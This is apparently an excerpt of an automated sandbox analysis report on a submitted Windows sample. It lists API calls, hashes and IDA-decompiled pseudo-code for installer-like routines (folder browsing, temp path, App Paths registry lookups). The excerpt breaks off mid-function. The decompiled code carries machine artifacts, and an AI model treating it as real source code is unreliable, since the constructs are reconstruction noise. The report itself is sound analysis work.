                                                                                                                                                                                                                                            0x00a03666
                                                                                                                                                                                                                                            0x00a03666
                                                                                                                                                                                                                                            0x00a03668
                                                                                                                                                                                                                                            0x00a0366e
                                                                                                                                                                                                                                            0x00a0366e
                                                                                                                                                                                                                                            0x00a03671
                                                                                                                                                                                                                                            0x00a03671
                                                                                                                                                                                                                                            0x00a03677
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03677
                                                                                                                                                                                                                                            0x00a03504
                                                                                                                                                                                                                                            0x00a03506
                                                                                                                                                                                                                                            0x00a03507
                                                                                                                                                                                                                                            0x00a0350c
                                                                                                                                                                                                                                            0x00a0365b
                                                                                                                                                                                                                                            0x00a0365f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03661
                                                                                                                                                                                                                                            0x00a03512
                                                                                                                                                                                                                                            0x00a03515
                                                                                                                                                                                                                                            0x00a035be
                                                                                                                                                                                                                                            0x00a035c1
                                                                                                                                                                                                                                            0x00a035d1
                                                                                                                                                                                                                                            0x00a035d8
                                                                                                                                                                                                                                            0x00a035de
                                                                                                                                                                                                                                            0x00a035f8
                                                                                                                                                                                                                                            0x00a03617
                                                                                                                                                                                                                                            0x00a03617
                                                                                                                                                                                                                                            0x00a03623
                                                                                                                                                                                                                                            0x00a03637
                                                                                                                                                                                                                                            0x00a0363d
                                                                                                                                                                                                                                            0x00a03642
                                                                                                                                                                                                                                            0x00a03644
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03646
                                                                                                                                                                                                                                            0x00a03652
                                                                                                                                                                                                                                            0x00a03657
                                                                                                                                                                                                                                            0x00a03658
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03658
                                                                                                                                                                                                                                            0x00a03644
                                                                                                                                                                                                                                            0x00a0351b
                                                                                                                                                                                                                                            0x00a0351d
                                                                                                                                                                                                                                            0x00a0354f
                                                                                                                                                                                                                                            0x00a03553
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0355f
                                                                                                                                                                                                                                            0x00a03565
                                                                                                                                                                                                                                            0x00a0357c
                                                                                                                                                                                                                                            0x00a03581
                                                                                                                                                                                                                                            0x00a03584
                                                                                                                                                                                                                                            0x00a0359b
                                                                                                                                                                                                                                            0x00a035a1
                                                                                                                                                                                                                                            0x00a035a7
                                                                                                                                                                                                                                            0x00a035ad
                                                                                                                                                                                                                                            0x00a035b3
                                                                                                                                                                                                                                            0x00a035b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a035b8
                                                                                                                                                                                                                                            0x00a03586
                                                                                                                                                                                                                                            0x00a03588
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03590
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03590
                                                                                                                                                                                                                                            0x00a03524
                                                                                                                                                                                                                                            0x00a03535
                                                                                                                                                                                                                                            0x00a03541
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03549
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000), ref: 00A03535
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00A03541
                                                                                                                                                                                                                                            • ResetEvent.KERNEL32 ref: 00A0355F
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00A01140,00000000,00000020,00000004), ref: 00A03590
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A035C7
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 00A035F1
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 00A035F8
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 00A03610
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 00A03617
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,lenta), ref: 00A03623
                                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 00A03637
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00A03671
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                            • String ID: lenta
                                                                                                                                                                                                                                            • API String ID: 2406144884-2780258678
                                                                                                                                                                                                                                            • Opcode ID: 575fa89b37bcd16ad8f4806b05a9e2483ea7d8effbc4cb3a8a05d440241a69d1
                                                                                                                                                                                                                                            • Instruction ID: 00f995cc4a5c7295d3079e36c66622dcfae24e7942117097c07634cd9aa74b06
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 575fa89b37bcd16ad8f4806b05a9e2483ea7d8effbc4cb3a8a05d440241a69d1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7731C27224030DBBDB209FA5BC4DE6B3A6DE799B00F104629F742952F1CB769903CB55
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                                                                            			E00A04224(char __ecx) {
                                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				char* _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				char* _t61;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				char* _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                                            				char _t76;
                                                                                                                                                                                                                                            				intOrPtr _t85;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t67 = __ecx;
                                                                                                                                                                                                                                            				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                                                            				if(_t66 == 0) {
                                                                                                                                                                                                                                            					_t63 = 0x4c2;
                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                            					E00A044B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                                                            				_v12 = _t26;
                                                                                                                                                                                                                                            				if(_t26 == 0) {
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					FreeLibrary(_t66);
                                                                                                                                                                                                                                            					_t63 = 0x4c1;
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                                                            				_v20 = _t28;
                                                                                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                                                            				_v16 = _t29;
                                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t76 =  *0xa088c0; // 0x0
                                                                                                                                                                                                                                            				if(_t76 != 0) {
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					 *0xa087a0 = 0;
                                                                                                                                                                                                                                            					_v52 = _t67;
                                                                                                                                                                                                                                            					_v48 = 0;
                                                                                                                                                                                                                                            					_v44 = 0;
                                                                                                                                                                                                                                            					_v40 = 0xa08598;
                                                                                                                                                                                                                                            					_v36 = 1;
                                                                                                                                                                                                                                            					_v32 = E00A04200;
                                                                                                                                                                                                                                            					_v28 = 0xa088c0;
                                                                                                                                                                                                                                            					 *0xa0a288( &_v52);
                                                                                                                                                                                                                                            					_t32 =  *_v12();
                                                                                                                                                                                                                                            					if(_t71 != _t71) {
                                                                                                                                                                                                                                            						asm("int 0x29");
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_v12 = _t32;
                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                            						 *0xa0a288(_t32, 0xa088c0);
                                                                                                                                                                                                                                            						 *_v16();
                                                                                                                                                                                                                                            						if(_t71 != _t71) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if( *0xa088c0 != 0) {
                                                                                                                                                                                                                                            							E00A01680(0xa087a0, 0x104, 0xa088c0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa0a288(_v12);
                                                                                                                                                                                                                                            						 *_v20();
                                                                                                                                                                                                                                            						if(_t71 != _t71) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					FreeLibrary(_t66);
                                                                                                                                                                                                                                            					_t85 =  *0xa087a0; // 0x0
                                                                                                                                                                                                                                            					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					GetTempPathA(0x104, 0xa088c0);
                                                                                                                                                                                                                                            					_t61 = 0xa088c0;
                                                                                                                                                                                                                                            					_t4 =  &(_t61[1]); // 0xa088c1
                                                                                                                                                                                                                                            					_t65 = _t4;
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t42 =  *_t61;
                                                                                                                                                                                                                                            						_t61 =  &(_t61[1]);
                                                                                                                                                                                                                                            					} while (_t42 != 0);
                                                                                                                                                                                                                                            					_t5 = _t61 - _t65 + 0xa088c0; // 0x1411181
                                                                                                                                                                                                                                            					_t44 = CharPrevA(0xa088c0, _t5);
                                                                                                                                                                                                                                            					_v8 = _t44;
                                                                                                                                                                                                                                            					if( *_t44 == 0x5c &&  *(CharPrevA(0xa088c0, _t44)) != 0x3a) {
                                                                                                                                                                                                                                            						 *_v8 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                                            0x00a04234
                                                                                                                                                                                                                                            0x00a0423c
                                                                                                                                                                                                                                            0x00a04240
                                                                                                                                                                                                                                            0x00a043b2
                                                                                                                                                                                                                                            0x00a043b7
                                                                                                                                                                                                                                            0x00a043c0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a043c5
                                                                                                                                                                                                                                            0x00a0424c
                                                                                                                                                                                                                                            0x00a04252
                                                                                                                                                                                                                                            0x00a04257
                                                                                                                                                                                                                                            0x00a043a4
                                                                                                                                                                                                                                            0x00a043a5
                                                                                                                                                                                                                                            0x00a043ab
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a043ab
                                                                                                                                                                                                                                            0x00a04263
                                                                                                                                                                                                                                            0x00a04269
                                                                                                                                                                                                                                            0x00a0426e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0427a
                                                                                                                                                                                                                                            0x00a04280
                                                                                                                                                                                                                                            0x00a04285
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0428d
                                                                                                                                                                                                                                            0x00a04293
                                                                                                                                                                                                                                            0x00a042e6
                                                                                                                                                                                                                                            0x00a042e9
                                                                                                                                                                                                                                            0x00a042ef
                                                                                                                                                                                                                                            0x00a042f4
                                                                                                                                                                                                                                            0x00a042f7
                                                                                                                                                                                                                                            0x00a04300
                                                                                                                                                                                                                                            0x00a04307
                                                                                                                                                                                                                                            0x00a0430e
                                                                                                                                                                                                                                            0x00a04315
                                                                                                                                                                                                                                            0x00a0431c
                                                                                                                                                                                                                                            0x00a04322
                                                                                                                                                                                                                                            0x00a04326
                                                                                                                                                                                                                                            0x00a0432d
                                                                                                                                                                                                                                            0x00a0432d
                                                                                                                                                                                                                                            0x00a0432f
                                                                                                                                                                                                                                            0x00a04334
                                                                                                                                                                                                                                            0x00a04343
                                                                                                                                                                                                                                            0x00a04349
                                                                                                                                                                                                                                            0x00a0434d
                                                                                                                                                                                                                                            0x00a04354
                                                                                                                                                                                                                                            0x00a04354
                                                                                                                                                                                                                                            0x00a0435d
                                                                                                                                                                                                                                            0x00a0436e
                                                                                                                                                                                                                                            0x00a0436e
                                                                                                                                                                                                                                            0x00a0437d
                                                                                                                                                                                                                                            0x00a04383
                                                                                                                                                                                                                                            0x00a04387
                                                                                                                                                                                                                                            0x00a0438e
                                                                                                                                                                                                                                            0x00a0438e
                                                                                                                                                                                                                                            0x00a04387
                                                                                                                                                                                                                                            0x00a04391
                                                                                                                                                                                                                                            0x00a04399
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04295
                                                                                                                                                                                                                                            0x00a0429f
                                                                                                                                                                                                                                            0x00a042a5
                                                                                                                                                                                                                                            0x00a042aa
                                                                                                                                                                                                                                            0x00a042aa
                                                                                                                                                                                                                                            0x00a042ad
                                                                                                                                                                                                                                            0x00a042ad
                                                                                                                                                                                                                                            0x00a042af
                                                                                                                                                                                                                                            0x00a042b0
                                                                                                                                                                                                                                            0x00a042b6
                                                                                                                                                                                                                                            0x00a042c2
                                                                                                                                                                                                                                            0x00a042c8
                                                                                                                                                                                                                                            0x00a042ce
                                                                                                                                                                                                                                            0x00a042e4
                                                                                                                                                                                                                                            0x00a042e4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a042ce

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00A04236
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00A0424C
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00A04263
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00A0427A
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,00A088C0,?,00000001), ref: 00A0429F
                                                                                                                                                                                                                                            • CharPrevA.USER32(00A088C0,01411181,?,00000001), ref: 00A042C2
                                                                                                                                                                                                                                            • CharPrevA.USER32(00A088C0,00000000,?,00000001), ref: 00A042D6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A04391
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A043A5
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                            • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                            • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                            • Opcode ID: 73c4fb64d02f9b1a9ced7e44d0cc332d7c9f98011597eb388dce863699f9b223
                                                                                                                                                                                                                                            • Instruction ID: 3b246b0cba4948172f8dff357d6acf00f23d9668352a54c9ae2203015d1da23e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 73c4fb64d02f9b1a9ced7e44d0cc332d7c9f98011597eb388dce863699f9b223
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C341E6B4A0030CAFE7119FA0FC94AAE7BB4FB5D344F444569EA81672D1CB788C068766
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A02773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v269;
                                                                                                                                                                                                                                            				CHAR* _v276;
                                                                                                                                                                                                                                            				int _v280;
                                                                                                                                                                                                                                            				void* _v284;
                                                                                                                                                                                                                                            				int _v288;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				int _t45;
                                                                                                                                                                                                                                            				int* _t50;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				CHAR* _t61;
                                                                                                                                                                                                                                            				char* _t62;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t52 = __ecx;
                                                                                                                                                                                                                                            				_t23 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                            				_t62 = _a4;
                                                                                                                                                                                                                                            				_t50 = 0;
                                                                                                                                                                                                                                            				_t61 = __ecx;
                                                                                                                                                                                                                                            				_v276 = _t62;
                                                                                                                                                                                                                                            				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                            				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                            					_t63 = 0x104;
                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t64 = _t62 + 1;
                                                                                                                                                                                                                                            					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                            					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                            					_t63 = 0x104;
                                                                                                                                                                                                                                            					_t34 = _v269;
                                                                                                                                                                                                                                            					if(_t34 == 0x53) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                            						goto L15;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_t34 == 0x57) {
                                                                                                                                                                                                                                            							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(_t52);
                                                                                                                                                                                                                                            							_v288 = 0x104;
                                                                                                                                                                                                                                            							E00A01781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                            							_t59 = 0x104;
                                                                                                                                                                                                                                            							E00A0658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                            							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                                                            								L16:
                                                                                                                                                                                                                                            								_t59 = _t63;
                                                                                                                                                                                                                                            								E00A0658A(_t61, _t63, _v276);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								if(RegQueryValueExA(_v284, 0xa01140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                                                            									_t45 = _v280;
                                                                                                                                                                                                                                            									if(_t45 != 2) {
                                                                                                                                                                                                                                            										L9:
                                                                                                                                                                                                                                            										if(_t45 == 1) {
                                                                                                                                                                                                                                            											goto L10;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            											_t45 = _v280;
                                                                                                                                                                                                                                            											goto L9;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t59 = 0x104;
                                                                                                                                                                                                                                            											E00A01680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                                                            											L10:
                                                                                                                                                                                                                                            											_t50 = 1;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								RegCloseKey(_v284);
                                                                                                                                                                                                                                            								L15:
                                                                                                                                                                                                                                            								if(_t50 == 0) {
                                                                                                                                                                                                                                            									goto L16;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                            0x00a02773
                                                                                                                                                                                                                                            0x00a0277e
                                                                                                                                                                                                                                            0x00a02785
                                                                                                                                                                                                                                            0x00a0278a
                                                                                                                                                                                                                                            0x00a0278d
                                                                                                                                                                                                                                            0x00a02790
                                                                                                                                                                                                                                            0x00a02792
                                                                                                                                                                                                                                            0x00a02798
                                                                                                                                                                                                                                            0x00a0279d
                                                                                                                                                                                                                                            0x00a028b2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a027a3
                                                                                                                                                                                                                                            0x00a027a3
                                                                                                                                                                                                                                            0x00a027af
                                                                                                                                                                                                                                            0x00a027c2
                                                                                                                                                                                                                                            0x00a027c8
                                                                                                                                                                                                                                            0x00a027cd
                                                                                                                                                                                                                                            0x00a027d5
                                                                                                                                                                                                                                            0x00a028b7
                                                                                                                                                                                                                                            0x00a028b9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a027db
                                                                                                                                                                                                                                            0x00a027dd
                                                                                                                                                                                                                                            0x00a028aa
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a027e3
                                                                                                                                                                                                                                            0x00a027e3
                                                                                                                                                                                                                                            0x00a027ec
                                                                                                                                                                                                                                            0x00a027f8
                                                                                                                                                                                                                                            0x00a02803
                                                                                                                                                                                                                                            0x00a0280b
                                                                                                                                                                                                                                            0x00a02831
                                                                                                                                                                                                                                            0x00a028c3
                                                                                                                                                                                                                                            0x00a028c9
                                                                                                                                                                                                                                            0x00a028cd
                                                                                                                                                                                                                                            0x00a02837
                                                                                                                                                                                                                                            0x00a0285a
                                                                                                                                                                                                                                            0x00a0285c
                                                                                                                                                                                                                                            0x00a02865
                                                                                                                                                                                                                                            0x00a02892
                                                                                                                                                                                                                                            0x00a02895
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02867
                                                                                                                                                                                                                                            0x00a02878
                                                                                                                                                                                                                                            0x00a0288c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0287a
                                                                                                                                                                                                                                            0x00a02880
                                                                                                                                                                                                                                            0x00a02885
                                                                                                                                                                                                                                            0x00a02897
                                                                                                                                                                                                                                            0x00a02899
                                                                                                                                                                                                                                            0x00a02899
                                                                                                                                                                                                                                            0x00a02878
                                                                                                                                                                                                                                            0x00a02865
                                                                                                                                                                                                                                            0x00a028a0
                                                                                                                                                                                                                                            0x00a028bf
                                                                                                                                                                                                                                            0x00a028c1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a028c1
                                                                                                                                                                                                                                            0x00a02831
                                                                                                                                                                                                                                            0x00a027dd
                                                                                                                                                                                                                                            0x00a027d5
                                                                                                                                                                                                                                            0x00a028e5

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharUpperA.USER32(E10713FE,00000000,00000000,00000000), ref: 00A027A8
                                                                                                                                                                                                                                            • CharNextA.USER32(0000054D), ref: 00A027B5
                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 00A027BC
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A02829
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00A01140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A02852
                                                                                                                                                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A02870
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A028A0
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00A028AA
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A028B9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00A027E4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                            • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                            • Opcode ID: 958f9b872afc37ed2d6fd6ad65926bae0f7384dc32aee95cc4196c7b049900f9
                                                                                                                                                                                                                                            • Instruction ID: 817e329c8022e757704792cfd3280655b58f2da9eee8c82b906d1a5a1519ad9b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 958f9b872afc37ed2d6fd6ad65926bae0f7384dc32aee95cc4196c7b049900f9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C419675A0022CAFDB24DF64AC89BEA77BDEF55700F0480A9F545D2190DB704E878FA1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                                                                                                            			E00A02267() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v836;
                                                                                                                                                                                                                                            				void* _v840;
                                                                                                                                                                                                                                            				int _v844;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
